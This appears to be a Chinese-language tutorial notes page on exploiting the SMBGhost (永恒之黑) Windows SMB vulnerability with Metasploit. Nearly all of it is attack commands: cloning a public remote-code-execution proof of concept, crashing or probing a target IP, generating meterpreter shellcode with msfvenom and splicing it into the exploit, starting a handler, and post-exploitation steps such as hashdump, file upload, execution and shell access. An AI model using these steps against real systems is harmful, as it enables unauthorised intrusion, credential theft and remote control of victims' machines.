永恒之黑
metasploit模块简介
Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持
Exploits 攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。
Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码
Post 后渗透攻击模块 收集更多信息或进一步访问被利用的目标系统
Encoders 编码模块 将攻击载荷进行编码,来绕过防护软件拦截
开始(可以多开几个终端进行)
下载poc: git clone https://github.com/chompie1337/SMBGhost_RCE_PoC
解压 unzip SMB。。。
可互相ping一下进行验证
再进入目录下,进行检测:python3 exploit.py -ip 192.168.233.165(目标ip)
若存在该漏洞,目标服务器回蓝屏重启
msfconsole进入msf
进入msf生成木马:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
进入SMB那个文件夹,找到exploit.py文件
替换POC,将上面生成的代码替换原文中的代码
记得把buf全部替换成poc
(使用exp反弹shell)
启动Metasploit监听
开启MSF:msfconsole
开启监听:use exploit/multi/handler
设置payload:set payload windows/x64/meterpreter/bind_tcp
监听端口: set lport 4444
目标主机: set rhost 192.168.1.143
攻击:run
运行poc,自动建立连接:python3 exploit.py -ip 192.168.233.165
进入后相关命令
查看用户权限: meterpreter> getuid
获取hash密码: meterpreter> hashdump
上传文件: meterpreter> upload
执行文件: meterpreter> execute -f notepad.exe
获取屏幕截图:meterpreter>screenshot
获取shell:meterpreter>shell
简单好用的帮助指令
help/? 帮助菜单
exit 退出MSF控制台
Back 返回上一级
info 显示一个或者多个模块的信息
show 显示所给类型的模块
background 将当前操作在后台运行
use 使用所选择的模块
set 设置选项
unset 取消设置的选项
session 会话